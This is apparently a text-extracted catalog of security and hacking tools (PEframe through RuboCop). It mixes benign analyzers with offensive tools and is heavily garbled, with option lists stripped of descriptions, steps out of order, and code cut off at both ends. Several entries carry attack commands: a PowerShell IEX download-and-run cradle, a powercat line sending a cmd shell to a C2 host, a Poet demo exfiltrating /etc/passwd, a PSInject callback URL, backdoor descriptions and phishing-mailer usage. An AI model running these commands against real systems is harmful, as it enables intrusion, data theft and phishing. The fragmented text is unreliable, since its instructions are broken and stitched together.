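    """Repeating-key XOR; symmetric, so it both encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def find_xor_encoded(buf: bytes, marker: bytes = DOS_STUB, max_key_len: int = 4):
    """Return [(key_len, offset, key)] for every place `marker` occurs in `buf`
    under a repeating XOR key of 1..max_key_len bytes (known-plaintext: the
    first key_len bytes of a window fix the key, the rest must agree).
    Plaintext copies (all-zero key) are skipped and the shortest key wins,
    so a 1-byte key is never also reported as a 2-, 3- or 4-byte key."""
    hits = []
    for off in range(len(buf) - len(marker) + 1):
        window = buf[off:off + len(marker)]
        for klen in range(1, max_key_len + 1):
            key = bytes(w ^ m for w, m in zip(window[:klen], marker[:klen]))
            if not any(key):
                continue                  # marker is in the clear here, not encoded
            if xor_bytes(window, key) == marker:
                hits.append((klen, off, key))
                break
    return hits


def format_report(hits) -> str:
    """Render hits as a table with hex and decimal offsets, like peframe."""
    lines = ["Key length  Offset (hex)  Offset (dec)  Key"]
    for klen, off, key in hits:
        lines.append(f"{klen:<10}  {off:#010x}    {off:<12}  {key.hex()}")
    return "\n".join(lines)


# --- constructed sample: a clear DOS stub, zero padding, then an encoded copy ---
SAMPLE_KEY = b"\x5a\xa7\x13"
SAMPLE = (b"MZ\x90\x00" + DOS_STUB + b"\x00" * 60
          + xor_bytes(DOS_STUB + b"$\x00\x00PE\x00\x00", SAMPLE_KEY)
          + b"\xff" * 16)
SAMPLE_OFFSET = 4 + len(DOS_STUB) + 60    # 102 = 0x66, where the encoded stub starts

if __name__ == "__main__":
    print(format_report(find_xor_encoded(SAMPLE)))
```

The key reported is the key as aligned at the marker's offset; if the marker does not start on a key boundary the bytes come out rotated, which is still enough to decode the whole region.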
Download PEframe
PEINJECTOR - MITM PE FILE INFECTOR
Download PEInjector
PEMCRACKER - TOOL TO CRACK ENCRYPTED PEM
FILES
Usage Example
bwall@ragnarok:~/data/publicprojects/pemcracker$ ./pemcracker test.pem test.dict
Password is komodia for test.pem
Compiling
make
Download Pemcracker
PENTESTBOX - PORTABLE PENETRATION TESTING
DISTRIBUTION FOR WINDOWS ENVIRONMENTS
PentestBox Demo
from Pentest Box
Tools category
Download PentestBox
PENTESTPACKAGE - A PACKAGE OF MULTIPLE
PENTEST SCRIPTS
CONTENTS:
Download PentestPackage
PENTOO 2015 - SECURITY-FOCUSED LIVECD BASED ON
GENTOO
Current Features :
Changes saving (including unetbooting support)
CUDA/OpenCL Enhanced cracking software
Kernel 4.0.8 and all needed patches for injection
XFCE 4.12
Please see blog for full release notes including known
bootloader issues with some versions of unetbootin
Full tools list.
Download Pentoo 2015
PHAN - STATIC ANALYZER FOR PHP
Getting it running
Phan requires PHP 7+ with the php-ast extension loaded. The
code you analyze can be written for any version of PHP.
To get phan running:
1. Clone the repo
2. Run composer install to load dependencies
3. Run ./test to run the test suite
4. Test phan on itself by running the following
./phan `find src/ -type f -path '*.php'`
phpize
./configure
make install
or give it a text file containing a list of files (but see the next
section) to scan:
phan -f filelist.txt
class lang_installer
test2.php:4 TypeError arg#1(arg) is object but escapeshellarg() takes string
test2.php:4 TypeError arg#1(msg) is int but logmsg() takes string defined at sth.php:5
test2.php:4 TypeError arg#2(level) is string but logmsg() takes int defined at sth.php:5
test3.php:11 TypeError arg#1(number) is string but number_format() takes float
test3.php:12 TypeError arg#1(string) is int but htmlspecialchars() takes string
test3.php:13 TypeError arg#1(str) is int but md5() takes string
test3.php:14 TypeError arg#1(separator) is int but explode() takes string
test3.php:14 TypeError arg#2(str) is int but explode() takes string
You can see the full list of command line options by running
phan -h .
Generating a file list
This static analyzer does not track includes or try to figure out
autoloader magic. It treats all the files you throw at it as one big
application. For code encapsulated in classes this works well.
For code running in the global scope it gets a bit tricky because
order matters. If you have an index.php including a file that
sets a bunch of global variables and you then try to access
those after the include in index.php the static analyzer won't
know anything about these.
In practical terms this simply means that you should put your entry points and any files setting things in the global scope at the top of your file list. If you have a config.php that sets global variables that everything else needs, put that first in the list, followed by your various entry points, then all your library files containing your classes.
Bugs
When you find an issue, please take the time to create a tiny
reproducing code snippet that illustrates the bug. And once you
have done that, fix it. Then turn your code snippet into a test
and add it to tests then ./test and send a PR with your fix
and test. Alternatively, you can open an Issue with details.
More on phpdoc types
All the phpdoc types listed on that page should work with one
exception. It says that (int|string)[] would indicate an array
of ints or strings. phan doesn't support a mixed-type constraint
like that. You can say int[]|string[] meaning that the array
has to contain either all ints or all strings, but if you have mixed
types, just use array .
That means you can do:
<?php
/**
 * MyFunc
 * @param int         $arg1
 * @param int|string  $arg2
 * @param int[]|int   $arg3
 */
function MyFunc($arg1, $arg2, $arg3) {
    // body not shown on the page; the phpdoc block above is what phan reads
}
checks the first 5 elements. If the first 5 are of the same type, it
assumes the rest are as well. If it can't determine the array subtype it just becomes array which will pass through most type
checks. In practical terms, this means that [1,2,'a'] is seen
as array but [1,2,3] is int[] and ['a','b','c'] as
string[] .
Dealing with dynamic code that confuses the analyzer
There are times when there is just no way for the analyzer to
get things right. For example:
<?php
function test() {
    $var = 0;
    $var = call_some_func_you_cant_hint();
    if(is_string($var)) {
        $pos = strpos($var, '|');
    }
}
This tells the analyzer that along with the int that it figures out
on its own, $var can also be a string or an array inside that
One of the big changes in PHP 7 is the fact that the parser now
uses a real Abstract Syntax Tree ( AST ). This makes it much
easier to write code analysis tools by pulling the tree and
walking it looking for interesting things.
Phan has 2 passes. On the first pass it reads every file, gets
the AST and recursively parses it looking only for functions,
methods and classes in order to populate a bunch of global
hashes which will hold all of them. It also loads up definitions
for all internal functions and classes. The type info for these
come from a big file called FunctionSignatureMap.
The real complexity hits you hard in the second pass. Here some things are done recursively depth-first and others not. For example, we catch something like foreach($arr as $k=>$v) because we need to tell the foreach code block that $k and $v exist. For other things we need to recurse as deeply as possible into the tree before unrolling our way back out. For example, for something like c(b(a(1))) we need to call a(1) and check that a() actually takes an int, then get the return type and pass it to b() and check that, before doing the same to c().
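To make the depth-first order concrete, here is an added toy model of the two passes, written in Python so it runs stand-alone; it is not Phan's code, uses a tiny hand-written signature map in place of FunctionSignatureMap, and represents calls as tuples rather than a real AST:

```python
# Added example, not Phan's own code: a toy model of Phan's two-pass design.
# Pass 1 only collects signatures; pass 2 walks a nested call depth-first,
# checking each argument against the callee before using its return type.

# Stand-in for Phan's FunctionSignatureMap: internal functions the checker
# knows without parsing user code. Types are phpdoc-style strings.
INTERNAL_SIGNATURES = {
    "strlen": (["string"], "int"),
    "md5": (["string"], "string"),
    "number_format": (["float"], "string"),
}


def first_pass(definitions):
    """definitions: (name, [param types], return type) for each user function,
    gathered before any call is checked, so a call can resolve a function
    that is only defined later in the file list."""
    sigmap = dict(INTERNAL_SIGNATURES)
    for name, params, ret in definitions:
        sigmap[name] = (params, ret)
    return sigmap


def literal_type(value):
    return {bool: "bool", int: "int", float: "float", str: "string"}[type(value)]


def compatible(actual, expected):
    """Union types are written 'int|string'; int is accepted where float is expected."""
    allowed = set(expected.split("|"))
    return actual in allowed or (actual == "int" and "float" in allowed)


def is_call(expr):
    return isinstance(expr, tuple) and len(expr) == 3 and expr[0] == "call"


def second_pass(expr, sigmap, issues):
    """Return the type of expr, appending problems to issues. expr is a
    Python literal or ("call", name, [args]); arguments are resolved before
    the enclosing call, which is exactly the unrolling order for c(b(a(1)))."""
    if not is_call(expr):
        return literal_type(expr)
    _, name, args = expr
    if name not in sigmap:
        issues.append(f"call to undefined function {name}()")
        return "mixed"                      # unknown type passes most checks
    params, ret = sigmap[name]
    if len(args) != len(params):
        issues.append(f"{name}() takes {len(params)} arg(s) but {len(args)} given")
    for i, arg in enumerate(args):
        actual = second_pass(arg, sigmap, issues)    # innermost call first
        if i < len(params) and actual != "mixed" and not compatible(actual, params[i]):
            issues.append(f"TypeError arg#{i+1} is {actual} but {name}() takes {params[i]}")
    return ret


def analyze(definitions, expr):
    """Run both passes; returns (type of expr, [issues])."""
    sigmap = first_pass(definitions)
    issues = []
    return second_pass(expr, sigmap, issues), issues


def call(name, *args):
    return ("call", name, list(args))


# constructed sample program: a(int): int, b(int): string, c(string): int
SAMPLE_DEFS = [("a", ["int"], "int"), ("b", ["int"], "string"), ("c", ["string"], "int")]

if __name__ == "__main__":
    print(analyze(SAMPLE_DEFS, call("c", call("b", call("a", 1)))))   # ('int', [])
    print(analyze(SAMPLE_DEFS, call("c", call("a", 1))))              # arg#1 of c() is int
```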
There is a Scope object which keeps track of all variables. It
mimics PHP's scope handling in that it has a globals along with
entries for each function, method and closure. This is used to
detect undefined variables and also type-checked on a return
$var .
Quick Mode Explained
Running tests
vendor/bin/phpunit
Download Phan
PHEMAIL - AUTOMATE SENDING PHISHING EMAILS
<body>]
-e
(Default: emails.txt)
-f
Newsletter)
-b
-p
body.txt)
searched (Default: 10 pages)
-v
-l
-B
-m
-g
pictures
to
username:password
-t
(Default: 3 sec)
-R
-L
emails)
webserver log file (Default: Date time in format "%d_%m_
%Y_%H_%M")
-S
-d
-n
(Default: 10 emails)
-c
-w
-o
-F
points to
0- firstname surname
1- firstname.surname@example.com
2- firstnamesurname@example.com
3- f.surname@example.com
4- firstname.s@example.com
5- surname.firstname@example.com
6- s.firstname@example.com
7- surname.f@example.com
8- surnamefirstname@example.com
9- firstname_surname@example.com
Examples:
phemail.py -e emails.txt -f "Name Surname <name_surname@example.com>" -r "Name Surname <name_surname@example.com>" -s "Subject" -b body.txt
phemail.py -S example -d example.com -F 1 -p 12
phemail.py -c https://example.com
Disclaimer
Download PhEmail
PIXIEWPS - BRUTEFORCE OFFLINE THE WPS PIN (PIXIE
DUST ATTACK)
INSTALLATION
USAGE
Usage: pixiewps <arguments>
Required Arguments:
  -e, --pke        : Enrollee public key
  -r, --pkr        : Registrar public key
  -s, --e-hash1    : Enrollee Hash1
  -z, --e-hash2    : Enrollee Hash2
  -a, --authkey    : Authentication session key
Optional Arguments:
  -n, --e-nonce    : Enrollee nonce
  -m, --r-nonce    : Registrar nonce
  -b, --e-bssid    : Enrollee BSSID
  -S, --dh-small   : Small Diffie-Hellman keys (PKr not needed)   [No]
  -f, --force      : Bruteforce the whole keyspace                [No]
  -v, --verbosity  : Verbosity level 1-3, 1 is quietest
  -h, --help       : Display this usage screen
USAGE EXAMPLE
Download Pixiewps
PLECOST - WORDPRESS VULNERABILITIES FINDER
This Plecost 3 version adds a lot of new features and fixes, such as:
Fixed a lot of bugs.
XML
$ plecost -v http://SITE.com -o results.xml
Or...
$ plecost -c 10 http://SITE.com
Updating
ScreenShots
Download Plecost
POET - A SIMPLE POST-EXPLOITATION TOOL
$ cd poet
$ make
Poet is super easy to use, and requires nothing more than the
Python (2.7) standard library. To easily try it out, a typical
invocation would look like:
Terminal 1:
$ ./poet-client -v 127.0.0.1 1
Terminal 2:
$ sudo ./poet-server
server
INTERVAL (s)
optional arguments:
  -h, --help
$ ./poet-server -h
usage: poet-server [-h] [-p PORT]
optional arguments:
  -h, --help
Demo
# ./poet-server
[+] Poet server started on 443.
[+] (2015-03-27 03:40:42.272601) Connected By:
('5.4.3.2', 59309) -> VALID
[+] (2015-03-27 03:40:42.273087) Entering control shell
Welcome to psh, the Poet shell!
Running `help' will give you a list of supported
commands.
psh > shell
psh > user@server $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
psh > user@server $ ^D
psh > exfil /etc/passwd
psh : exfil written to archive/20150327/exfil/passwd-201503274054.txt
psh > help
Commands:
chint
dlexec
exec
exfil
exit
help
recon
selfdestruct
shell
psh > exit
[+] (2015-03-27 03:40:57.144083) Exiting control shell.
[-] (2015-03-27 03:40:57.144149) Poet server terminated.
Download Poet
PORTDOG - SIMPLE PYTHON SCRIPT TO DETECT PORT
SCANNING TECHNIQUES
Raw packets for analysis. For this reason, please ensure that you run this script from a privileged session.
Usage:
sudo python portdog.py -t time_for_sniff_in_minutes
Download PortDog
PORTEXPERT - MONITORS ALL APPLICATIONS
CONNECTED TO THE INTERNET
HTTPS,...
Capability to show/hide system level processes
Capability to show/hide loopbacks
Time freeze function
Download PortExpert
POWERCAT - NETCAT: THE POWERSHELL VERSION
Installation
powercat is a powershell function. First you need to load the
function before you can execute it. You can put one of the
below commands into your powershell profile so powercat is
automatically loaded when powershell starts.
Load The Function From Downloaded .ps1 File:
. .\powercat.ps1
Load The Function From URL:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
Parameters:
  -l      Listen for a connection.                              [Switch]
  -c      Connect to a listener.                                [String]
  -p      The port to connect to, or listen on.                 [String]
  -e      Execute. (GAPING_SECURITY_HOLE)                       [String]
  -ep     Execute Powershell.                                   [Switch]
  -r      Relay. Format: "-r tcp:10.1.1.1:443"                  [String]
  -u      Transfer data over UDP.                               [Switch]
  -dns    Transfer data over dns (dnscat2).                     [String]
  -dnsft  DNS Failure Threshold.                                [int32]
  -t      Timeout option. Default: 60                           [int32]
  -i      Input: Filepath (string), byte array, or string.      [object]
  -o      Console Output Type: "Host", "Bytes", or "String"     [String]
  -of     Output File Path.                                     [String]
  -d      Disconnect after connecting.                          [Switch]
  -rep    Repeater. Restart after disconnecting.                [Switch]
  -g      Generate Payload.                                     [Switch]
  -ge     Generate Encoded Payload.                             [Switch]
  -h      Print the help message.                               [Switch]
Basic Connections
File Transfer
Shells
powercat supports more than sending data over TCP. Specify -u to enable UDP mode. Data can also be sent to a dnscat2 server with -dns.
Send Data Over UDP:
powercat -c 10.1.1.1 -p 8000 -u
powercat -l -p 8000 -u
Connect to the c2.example.com dnscat2 server using the
DNS server on 10.1.1.1:
powercat -c 10.1.1.1 -p 53 -dns c2.example.com
Send a shell to the c2.example.com dnscat2 server using
the default DNS server in Windows:
powercat -dns c2.example.com -e cmd
Relays
Generate Payloads
Misc Usage
Download Powercat
POWERTOOLS - COLLECTION OF POWERSHELL
PROJECTS WITH A FOCUS ON OFFENSIVE OPERATIONS
PowerUp
PowerUp is a powershell tool to assist with local privilege
escalation on Windows systems. It contains several methods to
identify and abuse vulnerable services, as well as DLL hijacking
opportunities, vulnerable registry settings, vulnerable schtasks,
and more.
Service Enumeration:
Get-ServiceUnquoted
Get-ServiceFilePermission
returns services
modifies a modifiable
Service Abuse:
Invoke-ServiceUserAdd
execute an arbitrary
replaces a service
replaces a service
restores a replaced
starts a given
Invoke-ServiceStop
Invoke-ServiceEnable
enables a given
disables a given
returns detailed
service
service
Invoke-ServiceDisable
service
Get-ServiceDetail
DLL Hijacking:
Find-DLLHijack
writes out a
checks if the
Registry Checks:
Get-RegAlwaysInstallElevated
Misc.:
Get-VulnSchTask
finds remaining
PowerBreach
PowerBreach is a backdoor toolkit that aims to provide the user
a wide variety of methods to backdoor a system. It focuses on
diversifying the "trigger" methods which allows the user
flexibility on how to signal to the backdoor that it needs to
phone home. PowerBreach focuses on memory only methods
that do not persist across a reboot without further assistance
and is not a silver bullet when it comes to cover
communications.
Helper Functions:
Add-PSFirewallRules - Adds powershell to the firewall on
65K ports. Required Admin
Invoke-CallbackIEX - The location for the various
callback mechanisms. Calls back and executes encoded
payload.
Backdoors Available:
Invoke-EventLogBackdoor: Monitors for failed RDP login
attempts. Admin-Yes, Firewall-No, Auditing Reqd
Invoke-PortBindBackdoor: Binds to TCP Port. Admin-No,
Firewall-Yes
Invoke-ResolverBackdoor: Resolves name to decide when to
callback. Admin-No, Firewall-No
Invoke-PortKnockBackdoor: Starts sniffer looking for
PowerPick
This project focuses on allowing the execution of PowerShell
functionality without the use of powershell.exe. Primarily this
project uses .NET assemblies/libraries to start execution of the
PowerShell scripts.
Many thanks to those in the offensive powershell community.
This work is not ground breaking but hopefully will motivate
offense and defense to understand the implications and lack of
protections available.
PSInject.ps1
the callback URL that is hard coded into the DLL. See this
script for more details.
The script that it calls back for must be base64 encoded. To do
this, you can simply use the built-in Linux utility 'base64'.
Example:
import-module psinject.ps1
Invoke-PSInject -Verbose -ProcID 0000 -CBURL http://1.1.1.1/favicon.ico
ReflectivePick
PewPewPew
This repo contains scripts that utilize a common pattern to host
a script on a PowerShell webserver, invoke the IEX download
cradle to download/execute the target code and post the results
back to the server, and then post-process any results.
More details here
PowerView
PowerView is a PowerShell tool to gain network situational
awareness on Windows domains. It contains a set of pure-PowerShell
replacements for various Windows "net *" commands, which utilize
PowerShell AD hooks and underlying Win32 API functions to perform
useful Windows domain functionality.
It also implements various useful metafunctions, including some
custom-written user-hunting functions which will identify where
on the network specific users are logged in. It can also check
Misc Functions:
Export-PowerViewCSV
thread-safe CSV
append
Set-MacAttribute
resolves a hostname
tests connectivity to
converts a given
to an IP
Test-Server
a specified server
Convert-NameToSid
Convert-SidToName
converts a security
converts a user/group
enumerates local
proxy settings
Get-PathAcl
returns all
returns all
search a local or
adds an ACL to a
enumerate -1000+
net * Functions:
Get-NetDomain
adds a local or
domain user
Get-NetComputer
current servers in the domain
Get-NetPrinter
gets registered
organization units
Get-NetSite
a domain
Get-NetSubnet
subnets for a domain
Get-NetGroup
current groups in a domain
Get-NetGroupMember
adds a local or
gets share
GPO functions
Get-GptTmpl
parses a GptTmpl.inf
to a custom object
Get-NetGPO
for a given domain
Get-NetGPOGroup
takes a user/group
domain or DC policy
User-Hunting Functions:
Invoke-UserHunter
try to build a
MetaFunctions:
Invoke-ShareFinder
finds (non-standard)
finds potentially
Find-UserField
searches a computer
enumerates members of
Download PowerTools
PROGUARD - JAVA CLASS FILE SHRINKER, OPTIMIZER,
OBFUSCATOR AND PREVERIFIER
WHAT IS SHRINKING?
DownloadProGuard
PROJECT ARTILLERY - FULL SUITE FOR PROTECTION
AGAINST ATTACK ON LINUX AND WINDOWS
For those technical folks you can find all of the code in the
following structure:
src/core.py - main central code reuse for things shared
between each module
src/monitor.py - main monitoring module for changes to
the filesystem
brute forcing
Supported platforms
Linux
Windows
DownloadProject Artillery
PROXENET - HACKER FRIENDLY PROXY FOR WEB
APPLICATION PENETRATION TESTS
this is what you are looking for, here are a few links for you:
ZAP
Burp
ProxyStrike
Or the best way, write your own GUI as a proxenet plugin!
Why ?
SSL
Full SSL interception (internal CA)
SSL client certificate authentication
IPv4/IPv6
HTTP Proxy forwarding
White-list/Black-list hosts filtering
Command interface out-of-band
Nice TTY colors :D
100% Open-Source
... and more !
The best of both world ?
DownloadProxenet
PROXYDROID - SET PROXYS (HTTP / SOCKS4 / SOCKS5)
ON YOUR ANDROID DEVICES
ProxyDroid is an app that can help you to set the proxy (http /
socks4 / socks5) on your android devices.
FEATURES
DownloadProxyDroid
PUPY - MULTI-PLATFORM REMOTE ADMINISTRATION
TOOL
Pupy is an opensource, multi-platform Remote Administration
Tool written in Python. On Windows, Pupy uses reflective dll
injection and leaves no traces on disk.
Features :
Implemented Modules :
Quick start
In these examples the server is running on a Linux host (tested
on Kali Linux) and its IP address is 192.168.0.1.
The clients have been tested on Windows 7, Windows XP, Kali
Linux, Ubuntu and Mac OS X 10.10.5.
generate/run a payload
for Windows
./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe
for MAC OS X
easy_install rpyc # (or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443
Some screenshots
help
interactive shell
t.start()
then, simply create a module to load our package and call the
function remotely:
class MsgBoxPopup(PupyModule):
    """ Pop up a custom message box """
    def init_argparse(self):
        self.arg_parser = PupyArgumentParser(prog="msgbox", description=self.__doc__)
        self.arg_parser.add_argument('--title', help='msgbox title')
        self.arg_parser.add_argument('text', help='text to print in the msgbox :)')

    @windows_only
    def is_compatible(self):
        pass

    def run(self, args):
        self.client.load_package("pupwinutils.msgbox")
        self.client.conn.modules['pupwinutils.msgbox'].MessageBox(args.text, args.title)
        self.log("message box popped !")
Dependencies
rpyc (https://github.com/tomerfiliba/rpyc)
DownloadPupy
PYERSINIA - NETWORK ATTACK TOOL
WHAT'S NEW?
Adding new attacks on the tool is a simple task because we
use the framework STB (Security Tool Builder). The new
INSTALLATION
Installing pyersinia is easy:
$ python -m pip install pyersinia
QUICK START
You can display inline help writing:
positional arguments:
arp_spoof_TARGET
arp_spoof_VICTIM
optional arguments:
-h, --help
-v, --verbosity
verbosity level
-a ATTACK_TYPE
-i IFACE
supported attacks:
arp_spoof, dhcp_discover_dos, stp_tcn, stp_conf,
stp_root
examples:
python pyersinia.py -a arp_spoof 127.0.0.1 127.0.0.1
python pyersinia.py -a stp_root -i eth0
Download Pyersinia
PYPHISHER - A SIMPLE PYTHON TOOL FOR PHISHING
If you are looking to run a phishing test or demonstration,
you can check out PyPhisher. This tool was created for the
purpose of phishing during a penetration test. The tool is
Python based and provides the user a way to send emails with a
customized template that they design. You can use an HTML
format that is similar to any organization's and replace the links
that you want to send.
This was inspired by SpearPhisher beta by Dave Kennedy from
TrustedSec and a feature found in Cobalt Strike by Raphael
Mudge from Strategic Cyber.
Usage:
PyPhisher.py --server mail.server.com --port 25 --username user --password password --html phish.txt --url_replace phishlink.com --subject Read!! --sender important@phish.com --sendto target@company.com
Available options:
--server
--html
in the email
--url_replace
--sender
email example
--sendto
Download PyPhisher
Q-SHELL - QUICK SHELL FOR UNIX ADMINISTRATOR
q-shell is a quick shell for remote login into Unix systems. It uses
the Blowfish cipher to protect transport data between client and
server. You get two programs: 'qsh' for the client and 'qshd' for the
server; these programs can be renamed to any name you
prefer.
Compile
1. server:
Just run qshd on server:
$ ./qshd
2.
$ export PATH=.:$PATH
4.
$ smbd
5.
6. client:
Set some environment variable, then run qsh:
$ export _IP=127.0.0.1
7.
$ export _PORT=2800
8.
$ unset _P
9.
$ ./qsh shell
10.
/path/to/server/file
3.
export _IP=192.168.0.$i
10.
export _PORT=2800
11.
export _P=key
12.
13.
# set key
done
14.
Download Q-shell
QARK - TOOL TO LOOK FOR SEVERAL SECURITY
RELATED ANDROID APPLICATION VULNERABILITIES
qark/sampleApps/goatdroid/goatdroid/AndroidManifest.xml
--exploit 1 --install 1
The sampleApps folder contains sample APKs that you can test
against QARK
Requirements
python 2.7.6
JRE 1.6+ (preferably 1.7+)
OSX or Ubuntu Linux (Others may work, but not fully
tested)
Documentation
Roadmap
DownloadQARK
RAWR - RAPID ASSESSMENT OF WEB RESOURCES
Features
A customizable CSV containing ordered information
gathered for each host, with a field for making notes/etc.
Input
Using NMap
RAWR accepts valid NMap input strings (CIDR, etc)
as an argument
-i can be used to feed it a line-delimited list.
Enumeration
--dns will have it query Bing for other hostnames and add
them to the queue.
(Planned) If IP is non-routable, RAWR will request an
AXFR using 'dig'
This is for external resources - non-routables are
skipped.
Results are cached for the duration of the scan to
prevent unneeded calls.
Crawl the site with --spider, notating files and docs in the
log directory's 'maps' folder.
Defaults: [conf/settings.py] follow subdomains, 3
links deep, timeout at 3min, limit to 300 urls
If graphviz and python-graphviz are installed, it will
create a PNG diagram of each site that is crawled.
Start small and make adjustments outward in respect
to your scanning environment. Please use caution to
avoid trouble. :)
Output
Report Customization
Give your HTML report a custom logo and title with --logo=<file> and --title=<title>.
The image will be copied into the report folder.
Click 'printable' in the HTML report to view the
custom header.
Updating
DownloadRAWR
REKALL - THE MOST COMPLETE MEMORY ANALYSIS
FRAMEWORK
OSX 10.6-10.8.
install
Jinja2
MarkupSafe
Pygments
astroid
pyzmq
tornado wsgiref
DownloadRekall
REMNUX V6 - A LINUX TOOLKIT FOR REVERSE-ENGINEERING AND ANALYZING MALWARE
analyzing Windows and Linux malware, examining browser-based threats such as obfuscated JavaScript, exploring
suspicious document files and taking apart other malicious
artifacts. Investigators can also use the distro to intercept
suspicious network traffic in an isolated lab when performing
behavioral malware analysis.
Malware Analysis Tools Installed on REMnux
DownloadREMnux v6
REMOTE DLL INJECTOR V2.0 - COMMAND-LINE TOOL TO
<pid>
<dll_file_path>
-h
<pid>
Inject DLL
<dll_file_path>
Examples of RemoteDLLInjector
//Show the help screen
RemoteDLLInjector.exe -h
//Inject DLL into 32-bit process with pid 1551
RemoteDLLInjector32.exe 1551 "c:\my project\inject32.dll"
//Inject DLL into 64-bit process with pid 1001
RemoteDLLInjector64.exe 1001 "c:\inject64.dll"
Download REXT
ROUTERCHECK - ANDROID APP FOR ENSURE THE
SAFETY OF YOUR ROUTER
there are any known problems. It will also perform some of the
same tests that hackers use to see how your router will
respond.
Open Ports
When RouterCheck finds that there are any problems with your
router, it will help guide you towards the steps you must take to
DownloadRouterCheck
RUBOCOP - A RUBY STATIC CODE ANALYZER, BASED
ON THE COMMUNITY RUBY STYLE GUIDE
Installation
RuboCop's installation is pretty standard:
$ gem install rubocop
Basic Usage
Running rubocop with no arguments will check all Ruby source
files in the current directory:
$ rubocop
def badName
^^^^^^^
test.rb:2:3: C: Use a guard clause instead of wrapping the code inside a conditional expression.
if something
^^
test.rb:2:3: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
if something
^^
test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2
end
^^^
1 file inspected, 4 offenses detected
Command flag | Description
-v/--version
-V/--verbose-version
-L/--list-target-files
-F/--fail-fast
-C/--cache
-d/--debug
-D/--display-cop-names
-c/--config
-f/--format | Choose a formatter.
-o/--out
-r/--require
-R/--rails
-l/--lint
-a/--auto-correct
--only
--except
--auto-gen-config
--exclude-limit | Limit how many individual files --auto-gen-config can list in Exclude parameters, default is 15.
--show-cops
--fail-level
-s/--stdin
Cops
Configuration
The behavior of RuboCop can be controlled via
the .rubocop.yml configuration file. It makes it possible to
enable/disable certain cops (checks) and to alter their behavior
if they accept any parameters. The file can be placed either in
your home directory or in some project directory.
RuboCop will start looking for the configuration file in the
directory where the inspected file is and continue its way up to
the root directory.
The file has the following format:
inherit_from: ../.rubocop.yml
Style/Encoding:
Enabled: false
Metrics/LineLength:
Max: 99
Inheritance
the value:
inherit_gem:
rubocop: config/default.yml
my-shared-gem: .rubocop.yml
cucumber: conf/rubocop.yml
Defaults
Exclude:
- 'db/**/*'
- 'config/**/*'
- 'script/**/*'
- !ruby/regexp /old_and_unused\.rb$/
# other configuration
# ...
Cops can also exclude only specific sets of files when that's
needed (for instance you might want to run some cop only on a
specific file). All cops support the Exclude param.
Rails/DefaultScope:
Exclude:
- app/models/problematic.rb
All cops are then disabled by default, and only cops appearing
in user configuration files are enabled. Enabled: true does
not have to be set for cops in user configuration. They will be
enabled anyway.
Severity
Each cop has a default severity level based on which
department it belongs to. The level is warning for Lint and
convention for all the others. Cops can customize their
severity level. Allowed params are refactor , convention ,
warning , error and fatal .
There is one exception from the general rule above and that is
Lint/Syntax , a special cop that checks for syntax errors
before the other cops are invoked. It can not be disabled and its
severity ( fatal ) can not be changed in configuration.
Metrics/CyclomaticComplexity:
Severity: warning
AutoCorrect
Cops that support the --auto-correct option can have that
support disabled. For example:
Style/PerlBackrefs:
AutoCorrect: false
One or more cops can be disabled on a single line with an end-of-line comment.
for x in (0..19) # rubocop:disable Style/AvoidFor
Formatters
You can change the output format of RuboCop by specifying
formatters with the -f/--format option. RuboCop ships with
several built-in formatters, and also you can create your custom
formatter.
Additionally the output can be redirected to a file instead of
$stdout with the -o/--out option.
Some of the built-in formatters produce machine-parsable
output and they are considered public APIs. The rest of the
formatters are for humans, so parsing their outputs is
discouraged.
You can enable multiple formatters at the same time by
specifying -f/--format multiple times. The -o/--out option
applies to the previously specified -f/--format, or the default
progress format if no -f/--format is specified before the -o/--out option.
# Simple format to $stdout.
$ rubocop --format simple
# Progress (default) format to the file result.txt.
$ rubocop --out result.txt
# Both progress and offense count formats to $stdout.
# The offense count formatter outputs only the final summary,
# so you'll mostly see the outputs from the progress formatter,
# and at the end the offense count summary will be outputted.
(the remaining combined-formatter commands, their $stdout/file routing diagram, and the sample clang and progress formatter output ending in "26 files inspected, 46 offenses detected", "1 file inspected, 4 offenses detected" and "ETA: 00:00:02" did not survive extraction)
Machine-parsable
The emacs formatter displays the offenses in a format suitable
for consumption by Emacs (and possibly other tools).
$ rubocop --format emacs test.rb
/Users/bozhidar/projects/test.rb:1:1: C: Use snake_case for methods and variables.
/Users/bozhidar/projects/test.rb:2:3: C: Favor modifier if/unless usage when you have a single-line body. Another good alternative is the usage of control flow &&/||.
/Users/bozhidar/projects/test.rb:4:5: W: end at 4, 4 is
Simple Formatter
(example output lost in extraction)
Files Formatter
Machine-parsable
Sometimes you might want to just open all files with offenses in
your favorite editor. This formatter outputs just the names of the
files with offenses in them and makes it possible to do
something like:
$ rubocop --format files | xargs vim
JSON Formatter
Machine-parsable
You can get RuboCop's inspection result in JSON format by
passing --format json option in command line. The JSON
structure is like the following example:
{
"metadata": {
"rubocop_version": "0.9.0",
"ruby_engine": "ruby",
"ruby_version": "2.0.0",
"ruby_patchlevel": "195",
"ruby_platform": "x86_64-darwin12.3.0"
},
"files": [{
"path": "lib/foo.rb",
"offenses": []
}, {
"path": "lib/bar.rb",
"offenses": [{
"severity": "convention",
"message": "Line is too long. [81/80]",
"cop_name": "LineLength",
"corrected": true,
"location": {
"line": 546,
"column": 80,
"length": 4
}
}, {
"severity": "warning",
"message": "Unreachable code detected.",
"cop_name": "UnreachableCode",
"corrected": false,
"location": {
"line": 15,
"column": 9,
"length": 10
}
}
]
}
],
"summary": {
"offense_count": 2,
"target_file_count": 2,
"inspected_file_count": 2
}
}
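Because the JSON formatter is one of the machine-parsable outputs that RuboCop treats as a public API, a CI job can consume it directly. The following is an added example, not RuboCop's own code: it reads a report in the structure shown above, applies the documented severity order (refactor, convention, warning, error, fatal) as a fail threshold, skips offenses that --auto-correct already fixed, and produces the same per-cop totals and path:line:col lines the offense count and emacs formatters print. The embedded report is constructed from the example above, not real tool output.

```python
"""Gate a build on RuboCop's --format json output (added example)."""
import json
from collections import Counter

# Severity ranks in the order the RuboCop documentation lists them.
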